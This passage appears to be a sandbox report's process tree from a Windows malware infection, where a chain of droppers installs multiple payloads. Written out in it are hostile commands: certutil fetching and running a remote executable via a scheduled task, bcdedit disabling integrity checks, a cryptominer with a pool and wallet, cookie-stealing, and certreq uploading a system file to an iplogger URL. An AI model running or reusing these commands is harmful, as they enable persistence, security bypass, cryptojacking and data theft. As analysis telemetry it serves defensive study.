C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
11⤵
PID:6248

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
12⤵
PID:836

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /8-23
11⤵
PID:6908

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
12⤵
- Creates scheduled task(s)
PID:5880

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
12⤵
- Creates scheduled task(s)
PID:6888

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
12⤵
PID:4204

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
13⤵
- Modifies boot configuration data using bcdedit
PID:6224

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
13⤵
- Modifies boot configuration data using bcdedit
PID:5852

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
13⤵
- Modifies boot configuration data using bcdedit
PID:7000

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
13⤵
- Modifies boot configuration data using bcdedit
PID:6348

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
13⤵
- Modifies boot configuration data using bcdedit
PID:5748

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
13⤵
- Modifies boot configuration data using bcdedit
PID:6056

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
13⤵
- Modifies boot configuration data using bcdedit
PID:1516

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
13⤵
- Modifies boot configuration data using bcdedit
PID:5220

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
13⤵
- Modifies boot configuration data using bcdedit
PID:6300

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
13⤵
- Modifies boot configuration data using bcdedit
PID:5620

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
13⤵
- Modifies boot configuration data using bcdedit
PID:6720

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
13⤵
- Modifies boot configuration data using bcdedit
PID:5760

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
13⤵
- Modifies boot configuration data using bcdedit
PID:6376

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
13⤵
- Modifies boot configuration data using bcdedit
PID:6036

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
12⤵
- Modifies boot configuration data using bcdedit
PID:6448

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
12⤵
PID:6508

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
12⤵
PID:4988

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
13⤵
PID:6120

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
14⤵
PID:6540

C:\Users\Admin\AppData\Local\Temp\kzd5hm5jq2d\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\kzd5hm5jq2d\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3700

C:\Users\Admin\AppData\Local\Temp\hyyzc3c1cej\cs0v1n1khqj.exe
"C:\Users\Admin\AppData\Local\Temp\hyyzc3c1cej\cs0v1n1khqj.exe" /ustwo INSTALL
8⤵
- Executes dropped EXE
PID:3472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "cs0v1n1khqj.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\hyyzc3c1cej\cs0v1n1khqj.exe" & exit
9⤵
PID:4092

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "cs0v1n1khqj.exe" /f
10⤵
- Kills process with taskkill
PID:4544

C:\Users\Admin\AppData\Local\Temp\ix1g33hpgew\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\ix1g33hpgew\Setup3310.exe" /Verysilent /subid=577
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5056

C:\Users\Admin\AppData\Local\Temp\5ka1tbn0chc\vict.exe
"C:\Users\Admin\AppData\Local\Temp\5ka1tbn0chc\vict.exe" /VERYSILENT /id=535
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4968

C:\Users\Admin\AppData\Local\Temp\i3petffbmhx\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\i3petffbmhx\chashepro3.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:212

C:\Users\Admin\AppData\Local\Temp\yxtyf4xsdq0\snunkwxhkty.exe
"C:\Users\Admin\AppData\Local\Temp\yxtyf4xsdq0\snunkwxhkty.exe" testparams
8⤵
- Executes dropped EXE
PID:4792

C:\Users\Admin\AppData\Roaming\l2jqvmywrba\03rmxcykcrh.exe
"C:\Users\Admin\AppData\Roaming\l2jqvmywrba\03rmxcykcrh.exe" /VERYSILENT /p=testparams
9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5700

C:\Users\Admin\AppData\Local\Temp\is-AD6PQ.tmp\03rmxcykcrh.tmp
"C:\Users\Admin\AppData\Local\Temp\is-AD6PQ.tmp\03rmxcykcrh.tmp" /SL5="$701DE,536425,199680,C:\Users\Admin\AppData\Roaming\l2jqvmywrba\03rmxcykcrh.exe" /VERYSILENT /p=testparams
10⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5176

C:\Users\Admin\AppData\Local\Temp\lrkkssjxaxa\kk1zazd4ft2.exe
"C:\Users\Admin\AppData\Local\Temp\lrkkssjxaxa\kk1zazd4ft2.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1416

C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
4⤵
- Executes dropped EXE
PID:2296

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
5⤵
PID:3680

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
6⤵
- Kills process with taskkill
PID:580

C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2860

C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\BTRSetp.exe"
4⤵
- Executes dropped EXE
PID:2572

C:\ProgramData\8211062.90
"C:\ProgramData\8211062.90"
5⤵
- Executes dropped EXE
PID:380

C:\ProgramData\1943025.21
"C:\ProgramData\1943025.21"
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4500

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
6⤵
- Executes dropped EXE
PID:572

C:\ProgramData\7053625.77
"C:\ProgramData\7053625.77"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2420

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
6⤵
- Executes dropped EXE
PID:5692

C:\ProgramData\6710301.73
"C:\ProgramData\6710301.73"
5⤵
- Executes dropped EXE
PID:4788

C:\ProgramData\4483827.49
"C:\ProgramData\4483827.49"
5⤵
- Executes dropped EXE
PID:4636

C:\ProgramData\4483827.49
"{path}"
6⤵
PID:5196

C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\gcttt.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3116

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:5316

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:5648

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:2508

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C607217CC065EC9CDB7EE893C6E57C13 C
2⤵
- Loads dropped DLL
PID:4340

C:\Users\Admin\AppData\Local\Temp\is-INDNL.tmp\kk1zazd4ft2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-INDNL.tmp\kk1zazd4ft2.tmp" /SL5="$80068,870426,780800,C:\Users\Admin\AppData\Local\Temp\lrkkssjxaxa\kk1zazd4ft2.exe" /VERYSILENT
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4536

C:\Users\Admin\AppData\Local\Temp\is-R0KAJ.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-R0KAJ.tmp\winlthst.exe" test1 test1
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6020

C:\Users\Admin\AppData\Local\Temp\773hKElno.exe
"C:\Users\Admin\AppData\Local\Temp\773hKElno.exe"
3⤵
PID:2176

C:\Users\Admin\AppData\Local\Temp\is-7VBUD.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7VBUD.tmp\IBInstaller_97039.tmp" /SL5="$8004A,14455514,721408,C:\Users\Admin\AppData\Local\Temp\kzd5hm5jq2d\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2232

C:\Users\Admin\AppData\Local\Temp\is-TT7AD.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-TT7AD.tmp\{app}\chrome_proxy.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3252

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
2⤵
PID:4012

C:\Users\Admin\AppData\Local\Temp\is-EIM08.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EIM08.tmp\vict.tmp" /SL5="$301F6,870426,780800,C:\Users\Admin\AppData\Local\Temp\5ka1tbn0chc\vict.exe" /VERYSILENT /id=535
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:840

C:\Users\Admin\AppData\Local\Temp\is-2D9P1.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-2D9P1.tmp\wimapi.exe" 535
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6108

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1aSny7"
1⤵
PID:4524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:4912

C:\Program Files (x86)\JCleaner\8.exe
"C:\Program Files (x86)\JCleaner\8.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo grYNxrw
2⤵
PID:5676

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
2⤵
PID:6060

C:\Windows\SysWOW64\cmd.exe
cmd
3⤵
PID:5160

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^PjMCYRVvFiGYRZCsTsllRymwdfLpHzjkTlyvJeXJBvVpnBIRpeOsWfRKMKjJuLOkUcyGUyIRzAIxpdCOHTqEEVgDaxJYPgDPHJgevwWrxWXvGvAcibwjLpHZiBgmcK$" Acre.wmz
4⤵
PID:2596

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
Fai.com Far.xlt
4⤵
PID:6152

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com Far.xlt
5⤵
PID:6460

C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
C:\Users\Admin\AppData\Local\Temp\koIijIMhEUjPv\Fai.com
6⤵
PID:1564

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ver > "C:\Users\Admin\AppData\Local\Temp\chrF292.tmp"
7⤵
PID:3196

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C wmic process get Name > "C:\Users\Admin\AppData\Local\Temp\chrF429.tmp"
7⤵
PID:836

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process get Name
8⤵
PID:5132

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 30
4⤵
- Runs ping.exe
PID:2640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
1⤵
- Blocklisted process makes network request
- Drops file in System32 directory
PID:4868

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/1EaGq7"
1⤵
PID:192

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
1⤵
PID:4572

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
2⤵
PID:5280

C:\Program Files (x86)\JCleaner\Venita.exe
"C:\Program Files (x86)\JCleaner\Venita.exe"
1⤵
- Executes dropped EXE
PID:2980

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
2⤵
PID:5872

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
2⤵
PID:5236

C:\Program Files (x86)\JCleaner\Venita.exe
"{path}"
2⤵
PID:1916

C:\Program Files (x86)\JCleaner\Brava.exe
"C:\Program Files (x86)\JCleaner\Brava.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4920

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
1⤵
PID:1364

C:\Windows\SysWOW64\certreq.exe
certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
2⤵
PID:5260

C:\Users\Admin\AppData\Local\Temp\is-90TKL.tmp\chashepro3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-90TKL.tmp\chashepro3.tmp" /SL5="$601FE,2012497,58368,C:\Users\Admin\AppData\Local\Temp\i3petffbmhx\chashepro3.exe" /VERYSILENT
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3932

C:\Users\Admin\AppData\Local\Temp\is-O75OE.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O75OE.tmp\Setup3310.tmp" /SL5="$5020C,802346,56832,C:\Users\Admin\AppData\Local\Temp\ix1g33hpgew\Setup3310.exe" /Verysilent /subid=577
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4900

C:\Users\Admin\AppData\Local\Temp\is-EPHEF.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-EPHEF.tmp\Setup.exe" /Verysilent
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5240

C:\Users\Admin\AppData\Local\Temp\is-5M88C.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5M88C.tmp\Setup.tmp" /SL5="$20490,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-EPHEF.tmp\Setup.exe" /Verysilent
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:968

C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\ProPlugin.exe" /Verysilent
4⤵
PID:6000

C:\Users\Admin\AppData\Local\Temp\is-F3ELN.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F3ELN.tmp\ProPlugin.tmp" /SL5="$401A2,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\ProPlugin.exe" /Verysilent
5⤵
PID:3112

C:\Users\Admin\AppData\Local\Temp\is-EHK5N.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-EHK5N.tmp\Setup.exe"
6⤵
PID:5008

C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"
7⤵
PID:1872

C:\Windows\SYSTEM32\TASKKILL.exe
TASKKILL /F /IM chrome.exe
8⤵
- Kills process with taskkill
PID:3424

C:\Windows\regedit.exe
regedit /s chrome.reg
8⤵
- Runs .reg file with regedit
PID:5488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chrome64.bat
8⤵
PID:4512

C:\Windows\system32\mshta.exe
mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
9⤵
PID:4556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX2\chrome64.bat" h"
10⤵
PID:5484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe"
11⤵
PID:5996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffaee796e00,0x7ffaee796e10,0x7ffaee796e20
12⤵
PID:4176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1844 /prefetch:8
12⤵
PID:4972

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1832 /prefetch:8
12⤵
PID:5480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1784 /prefetch:2
12⤵
PID:5524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2812 /prefetch:1
12⤵
PID:5520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
12⤵
PID:2264

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3296 /prefetch:8
12⤵
PID:5856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:1
12⤵
PID:208

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3752 /prefetch:1
12⤵
PID:6084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:1
12⤵
PID:3908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2320 /prefetch:8
12⤵
PID:1004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:1
12⤵
PID:5460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4352 /prefetch:8
12⤵
PID:5952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3308 /prefetch:8
12⤵
PID:5944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4824 /prefetch:8
12⤵
PID:5980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3416 /prefetch:8
12⤵
PID:6716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1760,4606385654069984710,12328078897625122858,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3356 /prefetch:8
12⤵
PID:6728

C:\Windows\regedit.exe
regedit /s chrome-set.reg
8⤵
- Runs .reg file with regedit
PID:5716

C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exe
parse.exe -f json -b firefox
8⤵
PID:6220

C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exe
parse.exe -f json -b chrome
8⤵
PID:6312

C:\Users\Admin\AppData\Local\Temp\RarSFX2\parse.exe
parse.exe -f json -b edge
8⤵
PID:4696

C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\Delta.exe" /Verysilent
4⤵
PID:1404

C:\Users\Admin\AppData\Local\Temp\is-ATVHU.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ATVHU.tmp\Delta.tmp" /SL5="$501A2,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\Delta.exe" /Verysilent
5⤵
PID:2844

C:\Users\Admin\AppData\Local\Temp\is-6R40U.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-6R40U.tmp\Setup.exe" /VERYSILENT
6⤵
PID:5124

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-6R40U.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:3992

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
8⤵
- Kills process with taskkill
PID:6232

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:6564

C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-9799C.tmp\zznote.exe" /Verysilent
4⤵
PID:5100

C:\Users\Admin\AppData\Local\Temp\is-HBSJU.tmp\zznote.tmp
